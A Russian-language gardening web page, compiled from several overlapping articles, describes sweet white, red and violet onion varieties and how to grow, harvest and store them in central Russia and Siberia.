5 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Знаете ли вы о сладких сортах репчатого лука

Знаете ли вы о сладких сортах репчатого лука

Появляется все больше незнакомых нам продуктов, выводятся новые сорта, создаются гибриды. Нам сложнее гнаться за новыми тенденциями. Новшества приходит за наш стол с названиями блюд, растений, овощей и фруктов. Не стоит отгораживаться от них, по принципу: хорошо только то, что привычно. Сегодня мы опровергнем такие устои, поговорив о обычном для нас репчатом луке и его севке, но о непривычном его сорте.

В последнее время появилось множество сортов сладкого лука

Виды лука

Мало кто из нас когда-то задумывался о репчатом луке. Только если вы не садовод весенней порой, или повар, готовящий какую-нибудь подливку с луком. К чему все это? А к тому что, знаете ли вы, что лука существует большое количество видов, разделяются они по разным критериям: времени высадки, времени сбора, способе посадки, цвету, вкусовым качествам.

По вкусовым характеристикам сорта лука разделяют на:

Подробнее о сладких сортах

Сладкие сорта только сейчас начали обретать популярность среди домохозяек, кулинаров и огородников. Проезжая мимо дач Подмосковья, я обратила внимание на большое количество высадок такого лука.

Домохозяйки и повара расхваливают вкусовые качества таких луковиц. Все мы хорошо помним, что каждый раз приготовление салата — это проливание горьких слез, кучи шелухи и кожуры. Сладкие сорта содержат намного меньше эфирных масел, именно этот факт и вносит существенное различие. Эфирные масла вызывают такую реакцию организма на лук, а также из-за этого лук имеет горький вкус.

Сладкий лук обычно используют в необработанном виде для салатов

Сладкие сорта лучше подходят для приготовления салатов, блюд с луком. Так же стоит отметить, что некоторые луковицы достигают размеров до 1 кг.

Они намного практичнее, но это не значит что намного лучше. Это только вам уже выбирать, что для вас приоритетнее — вкусовые качества, или практичность в хранении.

Лучшие виды лука сладких сортов

Какие же лучшие марки, сорта репчатого лука сейчас известны в мире и сугубо на отечественном рынке?

Эксибишен

Это американский сорт, применяемый специально в салатах. Вес луковицы от 600 грамм и до 1 килограмма (при хорошем климате, уходе и питательных ценностях грунта); форма – округлая, немного вытянутая, иногда красного цвета. Может сохранятся до 5 месяцев.

Лук Эксибишен дает очень крупные плоды

Глобо

Этот сорт уже более поздний. Вес примерно такой же, как и у Эксибишен, но форма более эллиптическая, широкая, цвет желтый. Главное преимущество – устойчивость к болезням.

Стерлинг F1

Этот сорт полуострый, но все же не уступает предыдущим по вкусовым качествам. Это среднепоздний голландский гибридный сорт с круглой луковицей белого цвета. Вес может достигать 0,8 килограмма. Плод устойчив к гниению.

Испанский 313

Сорт обладает сладким вкусом, но с островатым привкусом. Плоды позднеспелые, круглые, желтые. Но этот сорт репчатого лука достаточно небольшой, в сравнении с остальными. Его вес может составлять до 200 грамм.

Лук Испанский 313 слегка островат

Выращивание и севка лука

Но если вы решили сразу выкидывать свой обычный лук и уже спешите засаживать грядки этим новшеством, то пока приостановитесь. Не случайно этот лук имеет высокую стоимость. Существует ряд сложностей в его выращивании и уходе за ним. Особенно на нашей территории.

При нашем климате рассмотренные сорта можно высаживать только в виде рассады, ведь семена не смогут выдержать перепады температур и истощенные земли, если не вносить в них удобрения.

Посев проводится с конца февраля до начала марта. Это самый оптимальный период. Для проращивания семян подойдет любая тара: коробочки, ящики, стаканчики, обрезанные бутылки и тому подобное. Семена сначала замачиваются, затем немного подсушить, а уже потом производится севка.

Грунт должен быть легким, рыхлым. Обязательно нужно обогатить его удобрениями, лучшие удобрения — органические, перегной. Если примерно взять соотношение земли, песка и удобрения, то это 1:1:2. Можно для дезинфекционных мер воспользоваться древесной золой, добавив ее в смесь.

Она должна убить все бактерии. Засыпьте грунт в контейнеры, но оставьте место для еще одного слоя земли, которым вы присыпите разложенные семена. Этот нижний слой хорошо полейте водой, он как раз немного уляжется и утрамбуется.

Для посадки нужно отбирать только самый качественный лук севок

Высаживаем семена

Как происходит посев? Мысленно нарисуйте для себя сетку. Грани друг от друга будут располагаться на расстоянии примерно в 2 – 3 сантиметра, это будут рядочки, в самих рядках семена раскладывайте через 2 см. Теперь все семена посыпьте слоем земли примерно в 2 см. В таре с высаженными семенами нужно сделать парниковый эффект. Для этого обмотайте ящики, стаканчики пленкой, целлофаном, или просто накройте стеклом.

Накрытие должно быть прозрачным, чтобы оставался доступ света. Сложность севки вначале состоит в том, что нужно поддерживать постоянную температуру, где-то 22 — 26?С. Через пару недель у нас появятся первые всходы. Теперь нужно убрать с тары стекло, или пищевую пленку, смотря что вы использовали. Благодаря этом увеличивается доступ света, но стоит так же переставить рассаду на более светлое место, температуру нужно снизить до 11 — 15?С.

При последующем прорастании нужно создать температурный режим подобный естественному, который будет на грядках. Днем это примерно 15 — 20? С, а в темное время суток — 10 — 13?С. Относительная влажность воздуха должна составлять 65 — 75%. Посмотрите на количество и густоту всходов, если они расположены слишком густо, проредите их. Ростки нужно регулярно взращивать, стоит подкармливать их, даже минеральными удобрениями. Только при соблюдении всех правил ухода севка будет плодотворной.

Всходам лука необходим постоянный температурный режим

Когда наша рассада из севка уже наберется сил, питательных веществ и будет готова к высадке, подготавливаем грядки для нее. Высаживать репчатый лук стоит в начале мая. Основное — хорошее удобрение земли, ведь нашей рассаде нужно будет много сил, чтобы прижиться в новом грунте. Сначала, как и в предыдущем случае, добавьте в землю древесной золы, внесите в землю достаточно перегноя (на 1 кв. м около ведра), и минеральное удобрение. Перед тем как доставать рассаду, хорошо ее полейте, чтобы потом не повредить корневую систему, осторожно достаньте ее из ящиков.

Не знаю, как остальные земледельцы, но я обязательно подрезаю листья и корни. Это обеспечивает лучший приток питательных веществ и лучшую адаптацию растений к новому месту. Для того, чтобы получить крупные луковицы, нужно высаживать рассаду с увеличенным расстояние и интервалом между растениями. Сами грядки лучше сразу наметить, проведите их где-то на расстоянии 20 — 30 см, а рассаду будете высаживать через промежуток в 10 — 15 см. Такое расстояние обеспечит и больше удобрений и воды на одну головку лука, и возможность луковицы разрастаться.

Я высаживаю рассаду до уровня листьев лука, не сажайте растения слишком глубоко, в этом нет необходимости, так вы сделаете растению только хуже. Просто потом немного добавьте земли к отдельному растению, образуя как бы бугорок. Каждую высадку хорошо полейте водой. Не высаживайте растения при ярком солнце, это лучше делать утром, когда оно еще не “печет”, или уже ближе к вечеру, иначе оно их “попалит”, или рассада просто завянет, как говорят дачники, “опустит уши”.

Рассаду лука нужно сажать на значительном расстоянии друг от друга

Вы высадили лук, но это не значит, что теперь у вас меньше хлопот. Вам нужно постоянно взрыхлять грунт, поливать его (около 10 л воды на 1 кв. м), добавлять подкормки и удобрения. Такой интенсивный полив стоит применять первый месяц, дальше я немного снижаю количество поливов, а к июлю вообще свожу их к минимуму. Не забывайте хорошо удобрять растения, органические подкормки стоит чередовать с азотными, фосфатными, калийными.

Собираем урожай

Сбор урожая лучше проводить в августе, когда листья присохнут и опустятся земле. Если вы сделаете это раньше, то мясистая зелень начнет гнить, и вес лук у вас перепортится. Соберите лук, перенесите его в затемненное место пусть там он немного просохнет, но не оставляйте его на солнце.

Хранить лучше всего при температуре 15 — 18°С. Но помните, такой лук не будет лежать очень долго. Поэтому рассчитывайте и количество, чтобы вы успели его поесть, и он не пропал, только если вы не собираетесь его продавать. И все же запаситесь и обычным репчатым луком, который будет у вас почти до следующего урожая.

Урожай сладкого лука не подходит для длительного хранения

Этот овощ обладает целым рядом преимуществ. Все отмечают приятный сладковатый вкус этих сортов. Сочность и мясистость луковиц. Сладкий лук отлично придётся к каждому рецепту. Луковицами с один килограмм можно хвастаться перед соседями и другими огородниками, поверьте, повод для зависти достойный. Но основным все же есть витаминный комплекс этого лука. Огромное количество микроэлементов, витаминов, полезных веществ придёт на помощь и мамочкам для профилактики детей от простуды.

Беременным девушкам тоже стоит включить его в свой рацион. Не нужно брезговать сладким луком и спортсменам, его микроэлементы повышают мышечный тонус и выделение энергии при занятиях. Повышение иммунитета — основное полезное свойство любых видов лука. Но бывают лекарства вкусные и не очень, это тот случай, когда лекарство повкуснее ещё и полезнее аналога. Все больше парников и грядок Подмосковья наполняются рассадой сладких сортов.

Так что советую всем задуматься, и все же пойти приобрести пару луковиц, несмотря на высокую цену, ведь здоровье дороже. А если не хотите излишне тратится, то посадите такой сорт у себя на грядке, или несколько штук на подоконнике.

Сорта лука репчатого сладкого красного и белого

Среди всего разнообразия лука особым спросом пользуется именно репчатый. Он может быть представлен в различных сортах, некоторые из которых оказываются слишком едкими, но еще имеются сладкие виды. Они отлично подходят для салатов. Репчатый лук отлично сохраняет свои вкусовые качества на протяжении длительного времени и может быть использован для всех типов кулинарной обработки.

Белого сладкого лука

Белый сорт, в отличии от лука Карантанский порей, произрастает на огороде у многих дачников. В плане ухода он не требователен, зато после его употребления не остается луковый неприятный запах.

Глобо

Является позднеспелым. Позволяет выращивать урожайный и салатный сорт. Долго хранить его нельзя, так как он быстро портится. Мякоть белого цвета, сочная и имеет сладкий вкус. Как и лук-севок Штутгартер, данный сорт способен противостоять различным болезням. Выращенные плоды имеют большой размер и эллиптическую форму.

Масса одной луковицы составит 1 кг. Выращивать можно через рассаду, чтобы получить крупные плоды. Применять можно для приготовления салатов или в свежем виде.

Комета

Можно выращивать на садово-огородных участках. Он относится к раннеспелым. Головка лука округлая, ее вес составляет 50-70 г. Вкус у лука садкий, высокая урожайность. С 1 га можно собрать 186 ц плодов.

Испанский 313

Луковицы имеют округлую форму, хотя можно увидеть и овальные плоды. Масса луковицы составляет 100-145 г. Вкус сладкий, хранить можно долго, так как от этого вкус и торговый вид не испортится. Выращивание осуществляется через рассаду.

Красного вида

Красный сладкий лук имеет не только отличные вкусовые качества, но и привлекательный внешний вид. Вкус сладкий и сочный.

Багровый мяч

Этот сорт раннеспелый. Его можно употреблять в пищу уже через 3-4 месяца. Плоды имеют округлую форму и сиреневый окрас. При выращивании этого сорта можно получить высокую урожайность.

Если посмотреть на описание сорта лука Ред Барон и Багровый мяч, то употреблять эти два сорта лучше в необработанном виде. При выращивании стоит задействовать рассадный метод, так как при посадке семян дожидаться урожая нужно долго.

Грейтфул

Это гибридный сорт, который является среднеспелым. Сбор урожая может происходить уже на 112 день. Плоды имеют равный размер. Хранить лук можно в течение долгого времени, так как он не портится.

Кампилло

Противостоит болезням и различным условиям непогоды. Вкус у него характеризуется мягкостью, так что употреблять лук можно в необработанном виде.

Ретро

Это раннеспелый сорт, который дает обильный урожай через 90 дней с момента высадки. Луковицы имеют крупный размер и красный оттенок. Употребляют лук преимущественно в свежем виде и для приготовления салата. На фото – сорт ретро:

Черный принц

Имеет сладкий вкус. Лук может долго храниться и не утрачивать внешний вид и вкусовые качества. Кроме этого, в его составе содержится много витаминов и минералов.

Для средней полосы

Для средней полосы России, Подмосковья разработано много сортов сладкого лука. Все они подразделяются на раннеспелые среднеспелые и позднеспелые.

Как происходит выращивание лука на зелень на подоконнике, можно понять посмотрев видео в данной статье.

А вот как происходит выращивание лука на перо в домашних условиях, указано здесь.

Также будет интеерсно узнать о том, как происходит выращивание лука из семян на перо Аэропоника: //gidfermer.com/sadovodstvo/ovoshhevodstvo/vyrashhivanie-luka-na-pero.html

А вот как происходит выращивание из семян лука порей карантанский, поможет понять данное видео.

Арзамасский

Этот сорт относится к среднеспелым. Сбор урожая можно выполнять на 100 день с момент посадки. Вес одного плода составляет 30-70 г. Можно использовать для выращивания через севок.

Форма луковицы округло-кубовидная, а размер у нее средний. С 1 м2 можно получить 1,4 -3,2 кг урожая. Арзамасский характеризуется отличной лежностью и стойкостью к основным недугам. А вот как происходит выращивание лука в теплице, очень подробно изложено в данной статье.

Комета F1

Этот сорт также относится среднеспелым. Сбор урожая может происходить через 115 дней с момента посадки лука. Форма у плода округлая, вес составляет 50-70 г. Чешуйки имеют белый цвет. Сорт позволяет вырастить крупные ровные луковички, у которых сладкий вкус.

Кроме этого, сорт пользуется большим спросом среди дачников из-за высокой урожайности. С 1 м2 можно получить 2 кг плодов. Культура противостоит различным недугам. Для тех кто хочет понимать, можно ли сажать лук рядом с чесноком, и как это делать правильно, поможет понять данная информация.

Испанский 313

Этот сорт дает поздно урожаи. Собирать его необходимо только на 140 день с момента посадки. У плодов округлая форма и средняя плотность. Вкус может быть сладким или полуострым. С 1 м2 можно собрать 2,4-3 кг.

Лежность у него слабая, для продолжительного хранения использовать не рекомендуется. А вот можно ли сажать томаты после лука, и какие сорта можно высаживать, подробно изложено в данной статье.

Экстаз

Этот сорт сладкого лука уже на протяжении длительного времени пользуется спросом среди огородников. Его выращивание может осуществляться, как и семян, так и из севка. Окрас у луковицы желтый, а форма округлая. Масса одного плода составляет 100 г. С 1 м2 можно собрать 1,1-1,3 кг.

Этот сорт позволяет выращивать лук из семян. У луковичек свело-коричневый окрас, а форма эллипсоидная. Масса одного плода составляет 110 г. Сорт является однозачатковым. С 1 м2 можно собрать 3,2 кг.

Кэнди F1

Это гибридный сорт, который позволяет вырастить лук из семян. Окраска у луковичек темно-коричневая. Форма – яйцевидная. Масса одного плода составила 80 г. С 1 м2 можно получить 1,8-3,6 кг. А вот как вырастить ялтинский лук, и какие существуют особенности его выращивания, очень подробно рассказывается в данном видео.

Каприкорн F1

Это гибридный сорт, который выращивают из семян. Он относится к раннеспелым, но только выращивать его нельзя в условиях сурового климата. Луковички представлены в яйцевидной форме, у них коричневый окрас. Масса одного плода составляет 100-130 г. С 1 м2 можно собрать 2,4-3,6 кг. Также будет интересно узнать о том, как подготовить семена лука чернушки к посеву.

Для Сибири

Если выращивать сладкие сорта лука в Сибири, то необходимо выбирать такие, которые способны давать большой урожая при отрицательных погодных условиях. Самыми востребованными считаются такие сорта:

    Эксибишен. Это американский салатный сорт. Можно не задаваться вопросом как выращивать лук Эксибишен, так как с его посадкой справятся и начинающие огородики, а опытные могут вырастить плод весом 600 г. А порой при должном уходе вес достигает 1 кг. Сами луковички имеют округло-вытянутую форму. Особенность в том, что можно вырастить луковички с повышенным содержанием углеводов. Хранить лук можно в течение 4-5 месяцев.

Глобо. Отличается высокой урожайностью. Луковички плотные, имеют форму эллипса и желтый окрас. Масса одной луковички составляет 0,6 -1 кг. Имеется мягкая и сладкая мякоть. Способен противостоять различным недугам.

Стерлинг F1. Это голландский гибридный сорт, который является среднеспелым. Луковички круглые, имеют вес до 800 г. Шелуха белая, долго хранится. Противостоит корневой гнили.

Вырастить сладкий лук сегодня сможет совершено любой. Для этого нужно просто подобрать соответствующие сорта с учетом типа грунта и климатические условий. При должном уходе и правильной посадке вы сможете получить высокую урожайность сладкого лука, который можно будет использовать как в свежем виде, так и при приготовлении различных блюд.

Непривередлив в уходе, приятен на вкус — секреты выращивания сладких сортов репчатого лука в разных условиях

Репчатый лук довольно часто пользуется спросом, его выращивают на грядках, он совсем не прихотлив в уходе. Но не все знают, что обычный лук имеет достаточно много различных сортов, отличающихся по цвету, вкусу и даже запаху. Существуют сладкие виды лука, которые хорошо вписываются в приготовление любого салата или другого блюда. Важная особенность этих сортов в том, что даже со временем лук не теряет своих полезных свойств и сохраняет все вкусовые качества.

От чего зависит сладость лука

Один из факторов, которые влияют на вкус и запах лука — это регион произрастания. Сорта подбирают в зависимости от длины солнечного дня. Для каждого региона уже давно выведены разновидности репчатого лука, которые не дадут неожиданных результатов при урожае.

По каким причинам лук может горчить:

  • недостаточное количество фосфорных подкормок (для того, чтобы лук не имел горького вкуса, следует вносить суперфосфатные удобрения, иногда опытные садоводы рекомендуют увеличивать дозировку суперфосфата в несколько раз);
  • на вкус лука влияет влажность почвы, если растение испытывает недостаток влаги, тоего плоды будут иметь горький вкус (рекомендуется поддерживать нужный уровень влаги грунта, где произрастает овощная культура);
  • неправильно подобранный сорт для региона произрастания (стоит обращать внимание и на этот пункт, ведь иногда лук, который должен вырасти сладким, будет горчить из-за неподходящего для него климата).

Польза репчатого лука

  • Химический состав.

Репчатый лук очень богат на витамины и микроэлементы. Содержит в себе от 8 до 14% сахара, а также: белки, ферменты, витамины, минеральные соли, калий, фосфор, железо и другие.

Перья лука так же содержат сахар, белки, витамин C и эфирное масло, из-за которого у овоща имеется специфический вкус. В составе есть йод, пектин, органические кислоты и другие полезные элементы.

Нередко лук применяют в народной медицине. Он обладает противовоспалительным и противовирусным действием.

Сорта белого лука

Этот лук стремятся выращивать многие дачники, ведь он не требует особых условий произрастания и серьезных подкормок. При употреблении в пищу не оставляет запаха и неприятного послевкусия. Стоит рассмотреть несколько сортов белого лука, которые дадут сладкий урожай.

Этот сорт приносит поздние плоды. Довольно урожайный, подходит для приготовления салатов. К сожалению, длительному хранению не подлежит, быстро портится. Внутри плод белого цвета, сочный, с немного сладковатым вкусом.

В уходе не требует огромных затрат времени, хорошо противостоит насекомым-вредителям и различным заболеваниям.

Что касается урожая, у Глобо довольно крупные плоды эллиптической формы. Вес одной луковицы может достигать 1 кг. Для получения более крупного урожая рекомендуется выращивать рассадным способом. Употреблять можно в свежем виде или подвергнутым термообработке.

Этот лук относится к раннеспелым культурам. Его можно выращивать на любых участках. Вес одной луковицы до 70 г. По вкусу немного сладкий, неострый, белого цвета. Обладает высокой урожайностью, в уходе неприхотлив. Приблизительная урожайность с 0,5 га — 90 центнеров овощной культуры.

Этот лук бывает разной формы: иногда округлой, а иногда напоминает овал. Плоды испанского сорта вполне крупные, от 100 до 150 г. По вкусу сладкий, не горчит. Подлежит длительному хранению, при этом не теряет своих вкусовых качеств и полезных свойств. Выращивают «испанку» рассадным способом.

Красные сорта сладкого лука

Зачастую красный лук у всех ассоциируется со сладким вкусом. Это правда, ведь большинство красных сортов имеет сладковатый привкус, который гармонично вписывается в состав любого блюда.

Помимо приятного вкуса, плоды обладают фиолетовым оттенком, что значительно меняет внешний вид какого-нибудь салата или другого кулинарного творения.

Данный сорт отлично прижился в Подмосковье. Имеет красные плоды и сладковатый вкус. Нередко при добавлении этого лука в блюда, он окрашивает и другие ингредиенты. Хорошо сохраняется. Рекомендуется для употребления в сыром виде.

Относится к сортам, которые созревают очень рано. Спустя 4 месяца после посадки он готов к употреблению в пищу. Выращивая данный сорт, можно получить обильный и вкусный урожай. Есть его можно без дополнительной обработки. Во время выращивания следует использовать рассадный метод, потому что после посадки семян созревание луковиц займет длительное время.

Относится к гибридным сортам красного лука. Среднеспелый, собирать плоды можно спустя 4 месяца. По форме луковицы одинакового размера. Грейтфул подлежит длительному хранению.

Этот лук очень хорошо может противостоять различным заболеваниям, не боится изменения погодных условий. По вкусу мягкий, подлежит употреблению без термообработки.

Ранний сорт Ретро дает хороший урожай спустя 2,5 месяца после посадки. Плоды крупного размера с красным оттенком. Рекомендуется употреблять в свежем виде, добавляя в различные блюда.

Очень сладкий лук, который долго сохраняется, не теряя при этом своего вкуса и полезных свойств. Содержит огромное количество витаминов и микроэлементов.

Сладкие сорта голландской селекции

Голландские производители вывели достаточно много сортов, которые отлично произрастают в любых условиях.

Один из лучших гибридов голландской селекции. Отлично подходит для хранения зимой, относится к ранним сортам репчатого лука. Сибирь отличается сочностью плодов.

Сорт, выведенный голландцами, относится к среднеспелым видам репчатого лука. Плоды круглой формы, белого цвета. Вес одной луковицы может достигать 850 г. Подлежит длительному хранению, устойчив к прикорневой гнили и другим заболеваниям.

Это озимый сорт лука, шаровидной формы, розового цвета, характеризуется блестящей чешуей. Имеет сладкий вкус. Хорошо переносит морозы, долго хранится.

Достаточно высокоурожайный сорт, который очень ценят из-за мягкого вкуса. Подходит для употребления в свежем виде, не горчит. Луковицы лука Голден крупного размера, золотистого оттенка. Обладает высокой лежкостью.

Для средней полосы России

На сегодняшний день выведено немалое количество сортов сладкого лука, которые можно смело выращивать в средней полосе России. Разделяют их на два вида:

Относится к сортам средней спелости. Собирать урожай можно уже спустя 3-3,5 месяца после высадки. По весу одна луковица приблизительно 35-75 г. Арзамасский сорт можно сажать методом севка. По форме плоды округлые, среднего размера. Хорошо сохраняется, устойчив к различным заболеваниям.

Также относится к среднеспелому сорту лука. Урожай собирать можно спустя 3,5 месяца после высадки в грунт. По форме плоды круглые, весом от 50 до 75 г. У Кометы чешуи белого цвета, плоды со сладким привкусом. Весьма популярен среди садоводов, ведь луковицы неприхотливы в уходе и дают хороший урожай. С одного квадратного метра можно собрать более 2 кг белого лука.

Данный сорт дает поздний урожай. Начать собирать его можно только спустя 4 — 4,5 месяца после высадки в грунт. Плоды круглой формы, средней плотности. По вкусу может быть разным: от сладкого до слегка острого. Славится повышенным количеством урожая: с одного квадратного метра можно получить до 3 кг крупных плодов.

К сожалению, сохраняется испанский лук довольно плохо, поэтому выращивать его для того, чтобы он лежал, не рекомендуется.

Давний сорт, выращивают многие дачники. Сажать его можно способом севка или использовать для посадки семена. По окрасу желтоватого оттенка, по форме круглый. Вес одной луковицы приблизительно 100-120 г. С одного квадратного метра собирается 1 кг плодов.

Сорт Сима нередко выращивают из семян. Цвет луковиц коричневого оттенка, плоды эллипсоидной формы. Данный сорт относится к однозачатковым. С одного квадратного метра можно собрать более 3 кг овощной культуры.

Относится к гибридным, выращивается из семян. По окрасу лук темно-коричневый, овальной формы. По весу один плод приблизительно 85 г. С одного метра квадратного можно получить от 2 до 4 кг урожая.

Является гибридным раннеспелым. Для выращивания в плохих погодных условиях, при которых возможны сильные морозы, не рекомендуется. По форме плоды напоминают овал, луковицы коричневого оттенка. Один плод может весить от 100 до 150 г. С одного метра квадратного можно получить от 2,5 до 3,5 кг урожая.

Дачница рассказывает о том, как растет лук сорта Кэнди, о способах его выращивания.

Для Сибири

Для того, чтобы вырастить сладкий лук в суровых погодных условиях, важно подобрать сорта, которые будут приспособлены к холоду. Одними из самых популярных в Сибири являются следующие разновидности репчатого лука:

Данный сорт считается салатным, был выведен в Америке. Лук Эксибишен растет очень крупным, один плод может достигать от 500 г до 1 кг веса. Луковицы овальной формы, с вытянутым концом. Сохраняются плоды в течение 5 месяцев, не теряя при этом вкуса и полезных свойств.

Имеет достаточно высокую урожайность. Плоды плотные, желтого окраса. По весу тоже довольно крупные: от 500 г до 1 кг один плод. Внутри овоща сладковатая и мягкая мякоть. При выращивании не требует особых условий в уходе, противостоит заболеваниям.

Выведен голландцами. Относится к среднеспелым видам лука. Плоды круглой формы, белого цвета, весом до 850 г. Подлежит длительному хранению, устойчив к прикорневой гнили.

Для других регионов

Существуют сорта, которые внесены в реестр и проверены для каждой климатической зоны. К примеру, можно рассмотреть несколько сортов репчатого лука для Урала.

Ранний, но довольно острый сорт. Имеет круглую весьма плотную луковицу с желтыми чешуями. По массе плоды 35-60 г, обладает хорошей лежкостью — хранится до 9 месяцев.

Очень ранний сорт, дает много зелени. По виду плоская овальная луковица. Вес плодов может достигать до 200 г. Имеет приятный вкус, не средней остроты. Хорошо хранится, не стрелкуется.

Заключение

Чтобы вырастить сладкие и сочные плоды репчатого лука, не обязательно иметь особые условия на даче. Важно подобрать подходящий сорт на основе своих предпочтений и климата в регионе. Осуществляя правильный уход и контроль над заболеваниями, можно добиться хорошего урожая, который будет долго храниться и радовать дачника своим потрясающим вкусом.

Синий лук и все сладкие сорта

Нет ни одного блюда, в которое не добавлялся бы лук. Его используют с давних времен. В наше время многие хозяйки выращивают сразу несколько сортов, чтобы применять в кулинарии, согласно их вкусовым характеристикам. Для одних блюд нужен более острый лук, для других – помягче и слаще. В природе существует немало видов этой культуры, среди них в большинстве случаев выбираются именно салатные. Это тот же репчатый лук, только со сладким привкусом. Его шелуха, как и мякоть, могут быть разного цвета:

В статье речь пойдет именно о синем виде лука.

Что такое синий лук

Для тех, кто не знает, как называется фиолетовый лук, написана эта статья. Каждый огородник называет синий лук по-разному. Одни так и говорят – синий, другие называют – красный лук или фиолетовый. Все эти названия происходят именно от цвета самой луковички. Как бы его ни называли, его свойства и особенности не меняются. Приехал в Россию этот овощ из далекой Испании и после долгих и плодотворных трудов селекционеров прочно обосновался в этих краях.

Поначалу он был горьким, как и обыкновенный репчатый лук, но, благодаря трудам профессионалов, горечь частично ушла, и овощ стал красивым на вид и со сладким привкусом. Луковица этого вида имеет насыщенный фиолетовый цвет. Не только поверхность, но и мякоть приобрела этот же оттенок. Естественно, вся горечь из продукта не вышла, у него появился нежный, более приятный привкус. Фиолетовый лук содержит в своем составе большое количество полезных микроэлементов, благодаря чему широко используется не только в кулинарии, но и народной медицине.

Характеристика и особенности синего лука

Следует знать, что синим луком называют сразу несколько сортов этого овоща. Многим хочется знать, какой репчатый лук самый сладкий.

Под определение синий лук подходят следующие сорта.

Ред Барон

Этот сорт очень урожайный. С одного квадратного метра можно получить от полутора до двух килограмм овощей. Поверхность плода имеет бордовый цвет с синим оттенком. Мякоть на вкус слабо горькая, имеет сладость. Размер луковички средний. Высаживают его в грунт либо севком, либо семенами. Период вегетации растения длится до ста дней с момента посадки. Используют этот лук для приготовления свежих салатов или добавляют в соусы и супы.

Черный принц

Этот лук отлично плодоносит. С одного гектара при хороших условиях выращивания можно взять более пятидесяти тонн сочных плодов. Этот сорт отлично подходит для хранения и транспортировки. В процессе хранения не гниет. Высаживать в почву можно севками или непосредственно семенами. Его поверхность имеет темный цвет, который можно назвать и черным. На вкус он горьковато-сладкий, поэтому подходит как для употребления в свежем виде, так и для термической обработки.

Сорт «Черный принц»

Даниловский 301

Данный сорт относится к среднеспелым и отлично плодоносит. Чешуя овоща имеет насыщенный фиолетовый цвет. Одна луковица весит не менее ста пятидесяти грамм. При соблюдении всех правил хранения овощей, он совершенно не гниет. Этот сорт стал излюбленным на огородах Подмосковья.

Комиссар

Этот лук можно практически назвать великаном, поскольку с одного квадратного метра можно собрать не менее трех, а то и трех с половиной килограмм плодов. Луковицы имеют фиолетовый цвет, вкус сладковатый. При хранении не гниют и могут сохраняться не менее полугода.

Альвина

Эта разновидность лука высаживается рассадой или высевается семенами. С одного квадратного метра может дать более двух с половиной килограмм спелых сочных луковиц. Этот сорт самый лежкий, он имеет особенность храниться больше полугода, за что его предпочитает выращивать большинство огородников.

Все эти сорта между собой отличаются оттенками, а также по вкусу и полезным свойствам. Сиреневый лук очень полезен для здоровья человеческого организма.

К салатному виду относится и белый лук, одним из сортов которого следует отметить сорт Эксибишен. Это настоящий великан. Эксибишный лук вырастает весом до одного килограмма. Это вес одной луковицы.

Важно знать! Чтобы вырастить сортовой лук только на перо, семена нужно высевать близко друг от друга, чтобы сама луковица не имела возможности разрастаться. В это время перо, наоборот, будет тянуться вверх. При выращивании зелени лука не стоит забывать о подрезке стрел.

Синий лук не только хорошо сохраняется, он при выращивании еще и не боится нападения вредителей, а также практически не болеет. Как и все овощи, этот вид имеет свои сроки созревания: ранние, среднеспелые и поздние. Но, тем не менее, их все можно выращивать в Сибири.

Особенности выращивания вида

Весна – пора выращивания овощей, одним из которых выступает репчатый лук. Салатный лук отличается от классического репчатого и способом выращивания. Редко какой сорт можно вырастить из севка. В большинстве случаев это семенное размножение. Большинство салатных луков хранится не более четырех месяцев. Кроме того, он делится на три вида по вкусовым качествам. А именно:

Но следует принять во внимание, что вкус данного овоща зависит от места выращивания и ухода за растением. Салатный лук можно отличить от острого по консистенции его мякоти. Она более сочная и плотная. Чаще всего такие сорта хорошо вырастают в южных регионах, поскольку им нужно много тепла и света. Как известно, на юге световой день длится не менее четырнадцати часов.

Выращивание синего лука

Выращивать лук салатный из семян рекомендуется еще и потому, что в этом случае он становится более устойчивым против нападения вредителей и заболеваний. Севку же угрожают такие болезни, как:

  • ложная мучнистая роса;
  • белая гниль;
  • различные вирусы;
  • нематода.

Но, если сажать лук севком, это имеет свои положительные качества. Севок дает всходы намного раньше, чем семена, соответственно, луковички начинают раньше формироваться и расти. Растущие поблизости сорняки причиняют севку намного меньше дискомфорта (но это не значит, что сорную траву не нужно удалять с грядки). Посадка лука севком значительно проще семенного посева.

Когда лук нужно посадить на небольшую площадь, то возможно выращивание рассады. Выращивают ее на подоконнике или же в тепличных условиях. Лучше всего это начать делать за два месяца до посадки культуры в открытый грунт. В таре, где намерены высевать семена, необходимо сделать дренаж. Для этого в днище делается отверстие, в которое будет сходить излишек воды. Под слой почвы насыпается мелкая галька или керамзит, предварительно обработанный для обеззараживания и подогретый. Для растения берут смесь торфа с огородной землей. Ее ровняют и на поверхность кладут семена. После чего насыпают тонкий шар почвы, который не превышает полсантиметра.

Посадка лука в открытый грунт

Затем посуду с посеянными семенами нужно накрыть пленкой и поставить на подоконник. Периодически почву нужно поливать и вносить удобрения. После появления всходов импровизированную тепличку нужно открыть и немного снизить температуру воздуха. Когда рассаде исполнится месяц, у нее начнут появляться корешки. В это время грунт нужно обильно поливать и раз в семь дней вносить удобрения. Таким образом, молодые саженцы будут нормально расти и развиваться.

Когда рассада станет крепкой и хорошо укорениться, ее закаляют на свежем воздухе, а затем высаживают в открытый грунт. Таким образом, выращивание лука рассадой похожее на посадку севком. Луковицы вырастают крупными и здоровыми. Они становятся устойчивыми к заболеваниям и вредителям.

Хранение синего лука

Зима – это пора, когда человеческому организму необходимы витамины и минералы. В этом поможет луковичный запас. Сладкие сорта лука репчатого для длительного хранения требуют создания определенных условий. Долгосрочное хранение зависит от трех факторов, а именно:

  • сухое темное помещение;
  • комнатная температура воздуха;
  • влажность воздуха ниже шестидесяти процентов.

Сладкий лук нужно хранить в ящике, но, не снимая шелухи, или же как в прежние времена – собрать его в чулок. Температура воздуха в помещении должна быть не ниже -3 и не выше +10 градусов. Салатные сорта переносят минимальное понижение температуры до 0 градусов. Если овощ хранится в подвальном помещении, то его необходимо проветривать, поскольку повышение влажности до 80% способствует гниению. Если лука много, то для его хранения подойдет такая тара:

  • ящики из дерева;
  • коробки из картона;
  • лозовые корзины;
  • мешки;
  • сетки.

Ни в коем случае нельзя использовать полиэтиленовые пакеты, поскольку лук в них начинает париться и гнить. Местом хранения, кроме подвала, можно выбрать кладовку или антресоли. Для этой культуры важен доступ воздуха. Если правильно соблюдать все рекомендации по хранению этого овоща, то он всегда будет присутствовать на столе.

Покупая лук на рынке, нужно обращать внимание на такие факторы:

  1. При ощупывании головка должна быть твердой и крепкой;
  2. Мякоть сочная и мясистая;
